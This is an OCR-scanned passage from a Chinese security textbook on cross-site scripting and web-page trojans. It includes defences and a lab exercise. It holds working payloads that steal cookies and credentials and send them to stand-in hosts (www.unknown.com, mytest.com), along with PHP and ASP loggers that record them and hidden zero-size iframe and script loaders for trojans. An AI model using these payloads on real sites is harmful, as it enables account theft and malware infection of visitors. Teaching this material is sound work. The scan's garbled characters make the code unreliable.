指 通过 提交 恶意 数据 到 服务 端的 数据 库 ( 或 其 他 文件 形式 ) 中 ,使 网 页 进行 数据 查询 时 从 数 
据 库 中 读 出 恶意 数据 输出 到 页 面 的 一 类 跨 站 脚本 漏洞 ,具有 较 强 的 稳定 性 。 

持久 型 XSS 多 出 现在 Web 邮箱 .BBS .社区 等 从 数据 库 读 出 数据 的 正常 页 面 (比如 BBS 
的 某 篇 帖子 中 可 能 就 含有 恶意 代码 ) ,由 于 不 需要 浏览 器 提交 攻击 参数 ,所 以 其 危害 往往 大 
于 非 持久 型 XSS。 

3. 基于 DOM 的 XSS 跨 站 脚本 攻击 

DOM 是 Document Object Model( 文 档 对 象 模型 ) 的 缩写 。DOM 是 一 种 与 浏览 器 、 平 
台 .语言 无 关 的 接口 ,使 得 它 可 以 访问 页 面 中 的 其 他 标准 组 件 。 

基于 DOM 的 XSS 跨 站 脚本 攻击 是 通过 修改 页 面 DOM 节点 数据 信息 而 形成 的 跨 站 脚 
本 攻击 。 不 同 于 反射 型 XSS 和 存储 型 XSS, 基 于 DOM 的 XSS 往往 需要 针对 具体 的 
JavaScript DOM 代码 进行 分 析 , 并 根据 实际 情况 进行 XSS 的 利用 。 

以 下 是 一 段 存在 DOM 类 型 跨 站 脚本 漏洞 的 代码 : 


< Script> 
document .write (window.location.search); 


</script> 


在 JavaScript 中 window. location. search 是 指 URL 中 “*?” 之 后 的 内 容 , document. write 
是 将 内 容 输出 到 页 面 。 这 就 是 一 个 直接 输出 到 页 面 的 跨 站 脚本 漏洞 。 攻 击 时 只 需 构 造 类 似 
如 下 的 URL: 


http://localhost/test2541.Php?< script>alert (DOM Based XSS Test)< /script> 


读者 可 自行 查看 网 页 源 代码 ,注意 源 代码 有 没有 变化 。 
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5.3.3 XSS 常见 攻击 手法 


1. 盗 取 Cookie 

通过 XSS 跨 站 脚本 攻击 资 取 用 户 Cookie 信息 一 直 是 XSS 跨 站 脚本 攻击 漏洞 利用 的 最 
主流 方式 之 一 。Cookie 是 Web 程序 识别 不 同 用 户 的 标识 , 当 用 户 正 常 登录 Web 应 用 程序 
时 ,用 户 会 从 服务 端 得 到 一 个 包含 会 话 令 牌 的 Cookie。 例 如 : 


Set- Cookie: SessionID= 6010D6F2F7B24A182EC3DF53E65C88FCA17BOA96FAE129C3 


黑客 则 可 以 通过 XSS 跨 站 脚本 攻击 的 方式 将 嵌入 恶意 代码 的 页 面 发 送 给 用 户 , 当 用 户 
点 击 浏览 时 ,黑客 即 可 获取 用 户 的 Cookie 信息 并 用 该 信息 欺骗 服务 器 端 ,无 需 账 号 、 密 码 即 
可 直接 成 功 登 录 , 所 以 跨 站 脚本 攻击 的 第 一 个 目标 就 是 得 到 它 。 例 如 ,如 果 Web 邮箱 有 一 
个 XSS 漏洞 , 当 合 法 用 户 查 看 一 封 邮件 的 时 候 , 其 身份 标识 已 经 被 黑客 拿 到 ,黑客 就 可 以 如 
合法 用 户 一 般 自 由 出 入 邮箱 了 。 

在 JavaScript 中 可 以 使 用 document. cookie 来 获得 当前 浏览 器 的 Cookie, 所 以 一 般 是 
执行 这 样 的 代码 来 获得 Cookie: 


<Sczipt> 
document .write ("< img src= http://www. unknown. com/getcookie. asp? c="+ escape (document . 
cookie)+">"); 


</script> 


这 段 代 码 就 是 输出 img 标签 并 访问 黑客 的 Web 服务 器 的 一 个 ASP 程序 。 这 里 是 把 当 
前 的 Cookie 作为 参数 发 送出 去 (为 了 避免 出 现 特殊 字符 ,这 里 使 用 了 escape 函数 对 Cookie 
进行 URL 编码 )。 详 细 情 况 可 以 通过 Wireshark 捕获 数据 进行 分 析 。 

然后 在 www. unknown. com 上 的 getcookie. asp 需要 记录 传人 的 参数 (就 是 受害 用 户 
的 Cookie) ,代码 可 以 是 这 样 : 


<% 

if Request ("c")<>"" then 

Set fs=CreateObject ("Scripting.FileSystemObject") 

Set outfile= fs.OpenTextFile (server .mappath ("HisCookie.txt"),8,True) 
outfile.WriteLine Request ("c") 

outfile.close 

Set fs=Nothing 

end if 


%> 


一 旦 有 Cookie 发 过 来 ,ASP 程序 就 会 把 Cookie 写 入 到 当前 目录 的 HisCookie. txt 文 


件 中 。 
2. 保持 会 话 ( 盗 取 Cookie 的 升级 版 ) 
黑客 可 以 记录 存储 型 Cookie, 但 是 对 于 会 话 型 Cookie( 也 就 是 Session) ,过 一 段 时 间 如 
果 用 户 不 访问 页 面 .Session 就 会 失效 。 
为 了 解决 Session 时 效 性 的 问题 ,出 现 了 实时 记录 Cookie 并 不 断 刷新 页 面 保持 Session 
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的 程序 SessionKeeper。 这 个 工具 的 原理 是 : 得 到 用 户 Cookie 后 ,会 自动 模拟 浏览 器 提交 请 
求 , 不 断 刷 新 页 面 以 维持 Session 的 存在 。 

3. 页 面 劫持 ( 挂 马 和 钓鱼 攻击 ) 

所 谓 挂 马 就 是 在 网 页 中 添加 一 些 恶 意 代码 ,这 些 代 码 是 利用 了 浏览 器 及 ActiveX 控件 
的 漏洞 进行 攻击 的 。 如 果 不 幸存 在 这 些 漏洞 ,访问 这 个 页 面 的 时 候 就 可 能 会 中 木马 。 

在 XSS 的 攻击 代码 中 ,需要 用 iframe 或 者 script 甚至 弹出 窗口 引入 含有 网 页 木马 的 恶 
意 代码 网 页 /文件 。 类 似 的 代码 如 下 (其 中 http://www. unknown. com 是 一 个 包含 恶意 代 
码 的 页 面 ) : 


< iframe width= "0" height="0" src= "http://www.unknown.com">< /iframe> 


钓鱼 攻击 (phishing attack) 就 是 经 常 在 QQ .QQ 游戏 .空间 等 地 方 看 到 的 中 奖 信息 。 
利用 XSS 漏洞 的 钓鱼 更 加 隐蔽 且 更 具 欺 骗 性 。 


5.3.4 XSS 防范 


XSS 相对 其 他 攻击 手段 更 加 隐蔽 和 多 变 , 与 业务 流程 .代码 实现 都 有 关系 ,没有 一 劳 永 
逸 的 解决 方案 ,需要 权衡 产品 使 用 的 便利 性 和 安全 性 两 者 的 关系 。 一 般 可 采取 以 下 措施 。 

(1) 防 堵 跨 站 漏洞 ,阻止 攻击 者 利用 在 被 攻击 网 站 上 发 布 跨 站 攻击 语句 ,不 可 以 信任 用 
户 提交 的 任何 内 容 。 首 先 , 在 代码 中 对 用 户 输入 的 数据 都 需要 仔细 检查 (例如 输入 数据 的 长 
度 ) ,以 及 对 “二 ”“ 二 ”“;”“" 等 字符 进行 过 滤 ( 引 发 SQL 注入 的 常见 字符 如 表 5-1 所 示 ) 。 
其 次 ,任何 内 容 写 到 页 面 之 前 都 必须 加 以 编码 ,避免 产生 新 的 标签 语句 。 这 一 措施 可 以 防止 
大 部 分 的 XSS 攻击 。 

表 5-1 SQL 注入 漏洞 的 常见 字符 
字 符 和 SQL 的 关系 

单 引 号 ,是 用 来 分 割 字符 串 的 。 一 个 不 匹配 的 单 引号 会 产生 错误 
结束 一 个 语句 。 提 前 结束 查询 会 产生 一 个 错误 


/*¥ 注释 分 隔 符 。 注 释 分 隔 符 内 的 文字 会 被 忽略 
一 %20 | 可 以 用 来 提前 终止 一 个 查询 
() 圆 括 号 ,用 来 组 合 逻 辑 语句 。 不 匹配 的 括号 会 产生 一 个 错误 


在 数字 比较 中 ,字母 字符 会 产生 一 个 错误 。 例 如 ,Where valueID 一 1 是 合法 的 ,因为 valueID 
是 数字 而 1 也 是 数字 ;而 如 果 是 1x 则 不 正确 ,因为 1x 不 是 数字 


(2) Cookie 防盗 。 首 先 . 避 免 直接 在 Cookie 中 泄露 用 户 隐私 ,例如 E-mail、 密码 等 。 其 
次 ,通过 使 Cookie 和 系统 IP 绑 定 来 降低 Cookie 泄露 后 的 危险 。 这 样 攻击 者 得 到 的 Cookie 
没有 实际 价值 ,不 可 能 进行 重 放 攻击 。 

(3) 尽量 采用 POST 而 非 GET 提交 表单 。POST 操作 不 可 能 绕 开 JavaScript 的 使 用 ， 
这 会 给 攻击 者 增加 难度 :减少 可 利用 的 跨 站 漏洞 。 

(4) 严格 检查 HTTP 提交 (HTTP refer) 。 检 查 HTTP 提交 是 否 来 自 预 料 中 的 URL。 
这 可 以 阻止 第 (2) 类 攻击 手法 发 起 的 HTTP 请 求 ,也 能 防止 大 部 分 第 (1) 类 攻击 手法 ,除非 
正好 在 特权 操作 的 引用 页 上 进行 了 跨 站 访问 。 
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(5) 将 单 步 流程 改 为 多 步 , 在 多 步 流 程 中 引入 验证 码 。 多 步 流 程 中 每 一 步 都 产生 一 个 
验证 码 作为 hidden 表单 元 素 角 在 中 间 页 面 ,下 一 步 操作 时 这 个 验证 码 被 提交 到 服务 器 , 服 
务 器 检查 这 个 验证 码 是 否 匹配 。 首 先 , 这 使 第 (1) 类 攻击 增加 了 难度 。 其 次 ,攻击 者 必须 在 
多 步 流 程 中 拿 到 上 一 步 产生 的 校 验 码 才 有 可 能 发 起 下 一 步 请 求 . 这 在 第 (2) 类 攻击 中 是 几乎 
无 法 做 到 的 。 

(6) 引入 用 户 交 互 。 简 单 的 一 个 看 图 识 数 可 以 防止 几乎 所 有 的 非 预 期 特权 操作 。 

(7) 只 在 允许 anonymous( 匿 名 ) 访 问 的 地 方 使 用 动态 的 JavaScript。 

(8) 对 于 用 户 提交 信息 中 的 img 等 链接 ,检查 是 否 有 重 定向 回 本 站 不 是 真 的 图 片 等 可 
疑 操作 。 

(9) 内 部 管理 网 站 的 问题 。 很 多 时 候 , 内 部 管理 网 站 往往 下 于 关注 安全 问题 ,只 是 简单 
地 限制 访问 来 源 。 这 种 网 站 往往 对 XSS 攻击 缺乏 抵抗 力 。 

XSS 跨 站 脚本 攻击 作为 Web 应 用 安全 领域 中 最 大 的 威胁 之 一 ,不 仅 危害 Web 应 用 业 
务 的 正常 运营 ,对 访问 Web 应 用 业务 的 客户 端 环境 和 用 户 也 带 来 了 直接 的 安全 影响 。 虽 然 
XSS 跨 站 脚本 攻击 在 复杂 的 Web 应 用 环境 中 的 利用 方式 千变万化 ,但 是 通过 对 Web 应 用 
的 各 种 环境 进行 详细 分 析 和 处 理 , 完 全 阻 断 XSS 跨 站 脚本 攻击 是 可 以 实现 的 。 

实验 S-2 跨 站 脚本 攻击 实验 

【实验 目的 】 

(1) 深入 理解 跨 站 脚本 攻击 的 概念 。 

(2) 掌握 形成 跨 站 脚本 漏洞 的 条 件 。 

(3) 掌握 对 跨 站 脚本 的 几 种 利用 方式 。 

【实验 原理 】 

恶意 Web 用 户 将 代码 植 人 到 提供 给 其 他 用 户 使 用 的 页 面 中 ,如 果 程 序 没有 经 过 过 滤 或 
者 过 滤 敏 感 字 符 不 严密 就 直接 输出 或 者 写 人 数据 库 。 合 法 用 户 在 访问 这 些 页 面 的 时 候 , 程 
序 将 数据 库 里 面 的 信息 输出 ,这 些 恶 意 代 码 就 会 被 执行 。 

【实验 过 程 】 

为 了 模拟 跨 站 脚本 攻击 ,首先 编写 一 个 简单 的 发 帖 或 留言 板 的 网 页 ,编写 时 故意 不 对 用 
户 的 输入 作 太 多 约束 ,以 留 出 明显 的 XSS 漏洞 。 

(1) 构造 实验 网 页 。 下 面 的 HTML 语句 产生 一 个 发 表 评论 的 网 页 。 

< ! 演 示 xss 的 html> 

<html> 


<head> 
< ?php include('/components/headerinclude.php');?>< /head> 
< style type= "text/css"> 
.comment- title{ 
font- size:14px; 
margin: 6px 0px 2px 4px; 
二 
.comment- body{ 
font~ size: 14px; 
color:#ccc; 
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font- style: italic; 
border- bottom: dashed lpx #ccc; 
margin: 4px; 
上 
</style> 
< script type= "text/javascript" src="/js/cookies.js"></script> 
<body> 
< form method= "post" action="]ist.php"> 
<div style= "margin:20px;"> 
<div style= "font- size:16px;font-weight:bold;"> 发 表 评 论 < /div> 
<div style= "padding:6px;"> 
昵称: 
<br/> 
<input name= "name" type= "text" style= "width:300px;"/> 
</div> 
<div style= "padding:6px;"> 
评论 : 
<br/> 
<textarea name= "cormment" style= "height:100px; width:300px;"> 
< /textarea> 
</div> 
<div style= "padding- left :230px;"> 
< input type= "submit" value= "POST" style= "padding:4px Opx; width:80px;"/> 
</div> 
<div style= "border- bottom:solid lpx #fff;margin- top:10px;"> 
<div style="font- size:16px; font-weight:bold;"> 评 论 集 < /div> 
</div> 
<?php 
require('/components/comments .php'); 
if(!enmpty($_POST['name'])){ 
<! 添 加 新 的 评论 > 
agddElement ($_POST['name'],$_POST['comment']); 
} 
<! 展 开 评论 列表 > 
renderCorments ()7 
2 
</div> 
< /form> 
< /body> 
< /html> 


该 页 面 在 浏览 器 上 的 界面 如 图 5-2 所 示 。 
(2) 用 户 发 表 评论 。 由 于 网 页 信任 用 户 的 输入 ,因而 这 样 的 输入 将 会 被 接受 ,如 图 5-3 
所 示 。 
图 5-3(a) 的 评论 中 规 中 矩 ,图 5-3(b) 的 评论 虽 不 合 常理 但 也 无 关 紧 要 ,图 5-3(c) 则 暗藏 
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发表 评论 发 表 评论 发 表 评 论 

昵称 : 昵称 : 了 昵称: 
区 了 |] 表 草 儿 

评论 : 评论 : 评论 : 

犹 抱 酌 瑟 丰 涡 ! script 《script 
type= "text/javascript">console. log ("神奇 化 type= text/javascript“src= "http://mytest.c 
易 是 坦 道 ， 易 化 神奇 不 足 担 1") ;</script> om/hack. js"></script》 


eesL 


POST | 


(a) 普通 评论 


(b) 带 有 无 害 HTML 语 句 的 评论 


(c) 带 有 攻击 性 HTML 语 名 的 评论 
图 5-3 用 户 评论 


杀机 。 


(3) 实现 攻击 跨 站 脚本 。 图 5-3(c) 的 危害 程度 要 视 http://mytest. com/hack. js 里 隐 
藏 了 什么 而 定 。 假 设 其 中 是 下 面 的 语句 : 


Var username= CookieHelper.getCookie ('username') .value; 
Var Password= CookieHelper.getCookie ('password') .value; 


var script=document .createElement ('script'); 


Script.src= 'http://mytest .com/index.php?username= '+username+ '&password= 
'+password; 


document .body.appendChild (script); 


这 是 获取 Cookie 中 的 用 户 名 密码 的 JavaScript 脚本 ,利用 jsonp( 利 用 在 页 面 中 创建 


去 Script 一 节点 的 方法 向 不 同 域 提 交 HTTP 请 求 的 方法 称 为 JSONP) 脚 本 向 http:// 
mytest. com/index. php 发 送 了 一 个 get 请 求 , 而 该 请 求 内 容 如 下 : 
< ?php 
if(!empty($_GET['password'])){ 
$ username=$ _GET['username']; 
$ password=$ _GET['password']; 
try{ 
$path=$_SERVER["DOCUMENT ROOT"].'/password.txt'; 
$ fp= fopen ($ path, 'a'); 


flock ($ fp, LOCK EX); 
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fwrite ($ fp, "$username\t $password\r\n"); 
flock ($ fp, LOCK_ UN); 
fclose ($ fp); 

}catch (Exception $e){ 


} 


?> 


这 样 ,如 果 有 用 户 浏览 评论 ,XSS 攻击 者 就 可 窃取 访问 评论 的 用 户 信 息 。 

【实验 分 析 】 

(1) 构建 实验 环境 。 

按 要 求 需 搭 建 Web 服务 器 .安装 Apache 和 MySQL。 其 作用 是 通过 评论 将 恶意 代码 
植 人 服务 器 数据 库 中 。 

(2) 编写 代码 。 

根据 要 求 , 至 少 需 编写 以 下 代码 文件 : 

@ 创建 登录 文件 login. php, 用 以 录入 登录 者 账号 口令。 登录 后 ,账号 .口令 将 被 记录 
在 Cookie 上 。 后 续 过 程 将 破获 此 信息 。 

@ 创建 list. php, 用 于 从 数据 库 中 读 出 所 有 的 评论 信息 ,并 显示 出 来 。 其 作用 是 普通 用 
户 浏览 所 有 的 评论 ,攻击 代码 在 此 执行 。 

@ 创建 hack. js, 在 list. php 页 面 中 echo 执行 脚本 的 文本 时 会 执行 。 其 作用 是 在 
index. php 中 输入 恶意 代码 时 被 执行 ,并 通过 Cookie 获取 用 户 名 和 密码 ,传递 给 指定 页 面 。 

@ 创建 index. php 作为 攻击 方 的 网 页 ,用 于 记录 用 户 端 发 过 来 的 账号 、 密 码 等 信息 , 收 
集 并 存储 到 本 地 。 

@@ 适当 改造 “实验 过 程 ” 中 提供 的 实验 网 页 代码 ,以 文件 hbome. php 保存 。 其 作用 是 给 
用 户 提供 输入 文本 框 ,但 不 检查 输入 内 容 的 合法 性 ,将 所 有 输入 存 进 数 据 库 ,也 会 将 恶意 的 
代码 输入 存 进 数 据 库 。 

实验 时 ,用 户 在 浏览 器 登录 后 ,用户 名 和 密码 会 被 记录 在 Cookie 上 , 当 用 户 浏览 所 有 评 
论 信 息 时 ,由 于 攻击 方 事先 用 该 网 页 输入 了 攻击 代码 标签 ,该 标签 被 存 人 了 数据 库 , 这 些 攻 
击 代码 在 list. php 被 展示 出 来 时 会 被 执行 ,此 时 可 以 窃取 到 用 户 保 存在 Cookie 中 的 用 户 名 
和 密码 ,并 通过 参数 传递 的 方式 传 给 了 攻击 方 的 网 页 ,攻击 方 的 网 页 会 自动 截取 这 些 信息 并 
保存 到 攻击 方 主机 上 的 文本 文档 中 ,达到 远程 窃取 信息 的 目的 。 其 工作 流程 如 图 5-4 所 示 。 

【实验 验证 】 

要 求 贴 出 截图 。 

(1) 用 户 在 login. php 登录 后 ,浏览 器 记录 其 Cookie 信息 ,同时 跳 转 到 home. php 页 
面 ,接受 用 户 输入 评论 。 

(2) 记录 访问 用 户 的 Cookie 信息 ,然后 以 普通 用 户 身份 访问 评论 。 

(3) 攻击 者 在 文本 框 输入 攻击 代码 的 标签 语句 后 ,在 数据 库 里 会 查找 到 相应 的 记录 。 

(4) 打开 list. php 查看 所 有 评论 ,解释 记录 情况 。 

(5) 查看 攻击 者 获得 的 信息 ,这 些 信 息 与 访问 用 户 的 Cookie 是 否 一 致 ? 

(6) 通过 Wireshark 捕获 数据 包 进行 详细 分 析 。 
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图 5-4 XSS 实验 工作 流程 


【实验 思考 】 

(1) 根据 实验 结果 ,讨论 防御 跨 站 脚本 攻击 的 有 效 方法 。 

(2) 将 讨论 的 方法 应 用 到 实验 过 程 (1) 中 的 HTML 语句 中 ,重新 演绎 实验 过 程 (2)、 
(3) ,攻击 者 还 能 获取 用 户 信息 吗 ? 


5.4 网 页 木马 与 防范 


5.4.1 网 页 木马 


网 页 木马 就 是 攻击 者 在 正常 的 页 面 (通常 是 网 站 的 主页 ) 中 插入 一 段 代 码 , 浏 览 者 在 打 
开 该 页 面 的 时 候 , 这 段 代码 被 执行 ,然后 下 载 到 用 户主 机 并 运行 木马 的 服务 器 端 程序 ,进而 
控制 浏览 者 的 主机 。 整 个 过 程 都 在 后 台 运 行 , 一 旦 木马 网 页 被 打开 ,下 载 过 程 和 运行 过 程 就 
自动 开始 。 无 论 是 静态 网 页 还 是 动态 网 页 都 可 以 挂 马 。 攻 击 者 实施 网 页 挂 马 的 攻击 手段 比 
较 多 ,比如 注入 漏洞 . 跨 站 漏洞 旁 注 漏洞 、 上 传 漏洞 . 暴 库 漏洞 和 程序 漏洞 都 可 被 利用 。 

网 站 挂 马 进行 木马 植 信 的 攻击 过 程 可 简化 为 图 5-5。 


攻击 网 站 ， 使 用 Microsoft.XMLHTTP 
入 恶意 从 和 ADODB.Stream 对 象 将 
和 和 二 四 简 | “| 网 站 上 的 木马 文件 下 载 
| 本 | “| 到 本 地 机 
发 布 自己 的 执 利用 shell application 打 开 、 获取 并 
恶意 网 页 运行 木马 程序 上 传 数据 


图 5-5 网 页 木马 攻击 过 程 


一 个 网 页 木马 系统 由 3 部 分 组 成 : 木马 网 页 ,木马 程序 和 服务 程序 。 其 中 ,木马 网 页 主 
要 完成 内 嵌 木 马 .运行 木马 的 功能 :木马 程序 ( 即 客户 端 程序 ) 会 在 用 户 浏览 木马 网 页 时 被 自 
动 下 载 并 执行 ,主要 功能 是 建立 与 服务 程序 的 连接 ;而 服务 程序 主要 完成 木马 程序 的 运行 。 
这 说 明 网 页 木马 在 运行 .连接 方面 与 普通 木马 程序 相似 ,但 是 在 下 载 . 安 装 阶段 则 通过 浏览 
器 浏览 网 页 的 形式 完成 。 

目前 流行 的 网 页 木马 多 数 都 是 利用 JS. ActiveX、WSH(Windows 脚本 宿主 ) 共 同 合作 
来 实现 对 客户 端 计算 机 的 控制 。 其 攻击 过 程 如 图 5-5 所 示 。 其 中 , 使 用 Microsoft. 
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XMLHTTP 对 象 和 ADODB. Stream 对 象 将 网 站 上 事先 准备 好 的 木马 文件 (例如 exe 文件) 
下 载 到 本 地 计算 机 。Microsoft. XMLHTTP 对 象 负责 获取 木马 文件 .ADODB. Stream 对 象 
负责 将 木马 文件 保存 到 本 地 磁盘 。 

根据 编程 语言 分 类 ,网 页 木马 分 为 静态 和 动态 两 种 表现 形式 。 静态 网 页 木马 就 是 一 个 
HTML 页 面 ,动态 网 页 木马 可 以 是 JSP、ASP、PHP 等 语言 编写 的 代码 页 面 。 

网 页 木马 根据 传播 方式 的 不 同 可 以 分 为 被 动 挂 马 和 主动 挂 马 两 种 。 

(1) 被 动 挂 马 指 的 是 某 些 大 型 网 站 被 黑客 恶意 人 侵 , 在 页 面 中 嵌入 恶意 代码 。 被 动 网 
马 通常 都 会 依赖 于 具体 的 漏洞 才能 生存 。 挂 马 首 先 需要 恶意 攻击 者 编写 代码 制作 成 木马 ， 
之 后 将 木马 服务 器 端 文件 使 用 某 种 方法 放置 到 用 户 的 计算 机 上 ,并 向 外 发 送信 息 , 从 而 窃取 
用 户 个 人 账号 .密码 等 信息 。 这 种 将 木马 文件 通过 某 种 方式 放置 到 远程 受害 计算 机 上 的 过 
程 方 法 就 是 通常 所 说 的 “ 挂 马 ”。 

(2) 主动 挂 马 大 多 是 属于 钓鱼 性 的 攻击 ,钓鱼 页 面 是 恶意 攻击 者 自己 编写 的 一 个 与 正 
常 网 页 (多 数 为 银行 等 ) 几 乎 相同 的 页 面 , 用 户 如 果 不 注意 ,就 会 在 钓鱼 页 面 中 输入 自己 的 账 
号 信息 ,从 而 被 钓鱼 者 获得 用 户 信息 。 另 外 一 种 主动 挂 马 形式 是 通过 一 些 媒体 (例如 即时 通 
信和 软件 .电子 邮件 ) 人 为 地 或 者 木马 自动 给 好 友 发 送 欺 骗 性 的 链接 , 诱 使 对 方 点 击 , 从 而 将 用 
户 信息 收入 圳 中 。 

网 页 木马 根据 其 利用 漏洞 的 种 类 可 以 分 为 系统 漏洞 网 页 木马 和 软件 漏洞 网 页 木马 。 

(1) 系统 漏洞 网 页 木马 。 指 利用 各 种 系统 漏洞 或 内 置 组 件 漏洞 制作 的 网 页 木马 。 有 
OBJECT 对 象 漏洞 木马 .MIME 漏洞 网 页 木马 和 ActiveX 漏洞 木马 。 其 中 以 利用 ActiveX 
漏洞 的 网 页 木马 较 多 ,因为 该 类 木马 可 以 结合 WSH 及 FSO 控件 ,甚至 可 以 避 开 网 络 防火 
墙 的 报警 。 而 利用 OBJECT 对 象 漏洞 的 网 页 木马 也 可 以 结合 WSH 及 FSO 控件 ,危险 程度 
很 高 。 

(2) 软件 漏洞 网 页 木马 。 指 利用 软件 的 漏洞 来 制作 的 网 页 木马 。 通 常 网 络 用 户 的 有 关 
软件 升级 并 不 及 时 ,该 类 软件 由 于 存在 漏洞 常 被 木马 入 侵 , 并 进一步 危及 系统 乃至 整个 局 域 
网 。 如 网 上 的 一 些 搜索 工具 .下 载 工 具 、 视 频 软 件 .阅读 工具 都 曾 被 网 页 木马 利用 。 

目前 主要 的 挂 马 形式 有 下 面 这 些 。 

(1) iframe 式 挂 马 。 这 属于 框架 式 挂 马 。 攻 击 者 利用 iframe 语句 将 网 页 木马 加 载 到 任 
意 网 页 中 ,是 一 种 “久负盛名 ”的 挂 马 形式 。 其 代码 如 下 : 


< iframe src=http://www.unknown.com width=0 height=0>< /iframe> 


在 打开 插入 该 句 代 码 的 网 页 后 ,也 就 打开 了 http://www. unknown. com 页 面 ,但 是 由 于 它 
的 长 和 宽 都 为 0, 所 以 很 难 察觉 ,非常 具有 隐蔽 性 。iframe 标签 也 成 为 网 页 木马 检测 软件 的 
一 个 检测 标志 。 

(2) JavaScript 脚本 挂 马 。JavaScript 挂 马 是 一 种 利用 JavaScript 脚本 文件 调用 的 原理 
进行 的 网 页 木马 隐蔽 挂 马 技术 。 例 如 ,黑客 先 制作 一 个 hack. js 文件 ,然后 利用 JavaScript 
代码 调用 到 挂 马 的 网 页 。 其 代码 如 下 : 


< script language= javascript src=http://www.unknown.com/hack.js></script> 
该 文件 被 调用 后 将 会 在 用 户主 机 上 执行 木马 的 服务 端 。 这些 JavaScript 文件 可 以 手工 编 


写 , 也 可 以 通过 工具 生成 。 如 果 通 过 工具 生成 ,通常 攻击 者 只 需 输入 若干 选项 。 
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(3) 图 片 伪装 挂 马 。 图 片 木马 技术 是 逃避 杀毒 监视 的 新 技术 ,攻击 者 将 类 似 http:// 
www. unknown. com/test. htm 中 的 木马 代码 植 人 到 test gif 图 片 文件 中 ,这 些 租 入 代码 的 
图 片 可 以 用 工具 生成 (例如 火狐 图 片 木 马 生 成 器 ) ,攻击 者 只 需 输 入 相关 的 选项 。 其 实例 代 
人 码 如 下 : 


<html> 

< iframe src= "http://www.unknown.com/test.htm" height=0 width=0>< /iframe> 

< img src= "http://www.unknown.com/test.jpg">< /center> 

< /html> 

当 用 户 打 开 http://www. unknown. com/test. htm 时 ,显示 给 用 户 的 是 http://www. 
unknown. com/test. jpg, 而 http://www. unknown. com/test. htm 网 页 代码 也 随 之 运行 
火狐 图 片 木马 生成 器 如 图 5-6 所 示 。 


火 鞠 的 图 片 木马 生成 器 苗 力 : 天 泪 浪 客 [F.5.T】 


图 片 木 马 配置 
网 页 木马 的 地 址 : 《HTM 文 件 ) 


http://www.xyz. com/est html 


一 张 图 片 网 上 的 地 址 : 《JPG 文 件 或 GIF 文件 ) 


http // www wyz. com/test ipg 


height="0" scroling= mo” 
生成 文件 的 地 址 rameborder="0"> < /iframe> 
ss 
-特别 效果 
个 当 在 网 页 单 击 左 键 时 转向 网 页 森马 地 址 个 当 在 网 页 单 击 右键 时 转向 网 页 木马 地 址 个 全 选 


| 生成 文件 说 明 退出 


图 5-6 火狐 图 片 木 马 生成 器 


(4) 网 络 钓鱼 式 挂 马 。 这 是 网 络 中 最 常见 的 欺骗 手段 ,黑客 利用 人 们 的 猎奇 .贪心 等 心 
理 伪装 构造 一 个 链接 或 者 一 个 网 页 .利用 社会 工程 学 欺骗 方法 引诱 用 户 点 击 , 当 用 户 打开 一 
个 看 似 正 常 的 页 面 时 ,网 页 代码 随 之 运行 ,其 隐蔽 性 极 高 。 这 种 方式 往往 会 欺骗 用 户 输 入 某 
些 个 人 隐私 信息 ,然后 窃取 个 人 隐私 。 

(5) URL 伪装 挂 马 。 黑 客 利用 浏览 器 的 设计 缺陷 制造 的 一 种 高 级 欺骗 技术 , 当 用 户 访 
问 木 马 页 面 时 地 址 栏 显 示 www. baidu. com 等 用 户 信 任 的 地 址 ,其 实 却 打 开 了 被 挂 马 的 页 
面 ,从 而 实现 欺骗 。 示 例 代码 如 下 : 


<html> 

<head> 

<body> 

网 上 百科 全 书 , 当 推 

< span style= "cursor:pointer; color: blue" onclick=window.open ("http://www.unknown.com") ;> 
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<u> 百 度 < /u></span> <br> 

< /body> 

<html> 

上 面 代码 的 效果 貌似 到 百度 的 链接 ,但 实际 上 却 是 链接 到 另 一 网 站 。 

上 述 挂 马 方式 只 是 挂 马 的 部 分 方式 ,其 他 方式 ,如 CSS 挂 马 .E-mail 挂 马 等 ,难以 一 一 
列 出 ,读者 可 参考 相关 资料 。 


5.4.2 网 页 木马 防范 


网 页 木马 是 木马 的 伪装 方式 ,危害 很 大 。 需 要 未 雨 绸 缪 , 防 患 于 未 然 。 可 采取 如 下 
措施 。 
(1) 对 有 上 传 附件 功能 的 网 站 一 定 要 进行 身份 认证 ,并 只 允许 信任 的 用 户 使 用 上 传 程 
序 。 可 以 在 服务 器 ,虚拟 主机 控制 面板 的 设置 执行 权限 选项 中 直接 将 有 上 传 权限 的 目录 取 
消 ASP 的 运行 权限 。 

(2) 更 新 系统 补丁 ,升级 相应 软件 。 网 页 木马 都 是 利用 浏览 器 漏洞 进行 传播 的 ,所 以 经 
常 下 载 并 安装 最 新 的 系统 补丁 ,升级 软件 到 最 新 版 本 , 它 可 以 让 网 页 木马 找 不 到 可 以 利用 的 
漏洞 ,因而 可 以 将 感染 网 页 木马 的 几率 降 到 最 低 。 

(3) 提高 浏览 器 的 安全 级 别 , 禁 用 脚本 和 ActiveX 控件 运行 。 

(4) 安装 网 页 漏洞 防御 软件 。 如 超级 巡警 的 畅游 巡警 (http//www. sucop. com/ 
download/secplugfn. html) ,金山 清理 专家 (http://www. duba. net/ping/) 等 ,可 以 一 定 程 
度 上 防止 网 页 木马 的 入 侵 。 

(5) 使 用 相对 安全 的 浏览 器 。 网 页 木马 的 必 经 途径 是 浏览 器 ,使 用 相对 安全 的 浏览 器 
尤为 重要 , 绝 大 多 数 网 页 木马 都 是 针对 IE 内 核 的 浏览 器 ,而 使 用 非 IE 内 核 的 浏览 器 ,如 
360 浏览 器 (360SE. exe) .绿色 浏览 器 (GreenBrowser. exe) ,就 可 以 从 根本 上 防止 被 网 页 木 
马 攻击 。 不 要 随便 浏览 信用 度 不 高 的 网 站 ,下 载 资料 时 尽量 选择 一 些 大 型 门户 网 站 。 

(6) 使 用 专业 检测 查 杀 工具 ,并 升级 到 最 新 的 病毒 库 。 较 新 的 病毒 库 可 以 识别 出 大 部 
分 恶意 脚本 ,并 阻 断 恶意 代码 在 本 地 运行 ,可 大 大 降低 感染 网 页 木马 的 可 能 性 。 

正常 的 网 页 被 挂 马 ,不 仅 是 对 浏览 者 信息 层面 的 损害 ,更 是 对 网 站 的 建设 .维护 者 的 挑 
战 。 只 有 网 站 管理 者 加 固 站 点 的 安全 ,从 源头 上 杜绝 网 页 木马 ,才能 为 用 户 提 供 安 全 的 浏览 
环境 。 

实验 5-3 ”网 页 挂 马 分 析 实 验 

【实验 目的 】 

了 解 网 页 木马 的 工作 过 程 。 

【实验 原理 】 

